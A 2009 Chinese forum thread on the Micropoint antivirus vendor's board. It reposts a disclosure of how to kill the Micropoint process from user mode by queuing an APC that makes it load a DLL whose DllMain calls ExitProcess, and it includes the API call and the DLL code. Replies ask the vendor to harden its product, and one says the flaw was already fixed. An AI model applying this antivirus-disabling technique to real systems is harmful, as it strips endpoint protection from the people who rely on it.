微点交流论坛

标题: 利用APC代码注入Ring3强杀微点（严重） [转] [打印本页]

作者: sogou 时间: 2009-8-11 00:23 标题: 利用APC代码注入Ring3强杀微点（严重） [转]

本文作者：xuyangwan 昵称:給噯①嗰希望日期：09-02-26 14:19:17

微点的自我保护做得是相当不错了，正因为此，挑战微点的自我保护才更有趣。不过本文没有任何想要贬低微点的意图，仅作技术研究而已。

之前本人还写过两篇，在本空间可以找到，第一篇意义不大，第二篇还行，可以在ring3杀掉微点。

玩玩微点之一：利用CreateEvent函数不让微点启动
玩玩微点之二：利用远程线程Ring3杀微点（严重）

今天写的这篇意义和上面第二篇差不多，都是在ring3杀死微点。废话不说了，我大概说说思路：

1.首先得到微点进程的pid和handle，我想这不是什么难事；

2.枚举微点进程的每个线程，得到线程的tid和handle，我想这也不是什么难事；

3.在微点的进程内存中找这样的字符串"nel32.dll"，一定可以找到，因为"kernel32.dll"这样的字符串是必然存在的；找到以后把这个字符串的地址记录下来。切忌该过程中，顶多读它的内存而已，动作不要太大。

4.QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)pStrAddress) 其中hThread是上面第2步得到的线程句柄，pStrAddress是上面第3步得到的"nel32.dll"字符串的地址。

这样的话，由于微点没有防QueueUserAPC，于是nel32.dll便成功的注入到微点的某个进程中。当然了这里要注意两点：

一是，nel32.dll要提前复制到系统目录下去，例如C:\windows或者C:\windows\system32；

二是，为了杀死微点的进程，nel32.dll可以如下写：

BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved)
{
if(ul_reason_for_call == DLL_PROCESS_ATTACH)
ExitProcess(0);
return TRUE;
}

具体详情请见：http://hi.baidu.com/cool4/blog/item/2e51f5089b70348bd1581ba6.html

[ Last edited by sogou on 2009-8-11 at 00:30 ]

作者: sogou 时间: 2009-8-11 00:25
希望微点针对这一个问题，及时提高软件预防能力！！

支持国产，支持微点！

大家努力帮微点进步！

[ Last edited by sogou on 2009-8-11 at 00:32 ]

作者: mamsds 时间: 2009-8-11 09:34
太深奥了，完全不懂......

作者: 点饭的百度空间 时间: 2009-8-11 09:42
2009-1-21 16:09 此问题微点已经解决。

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn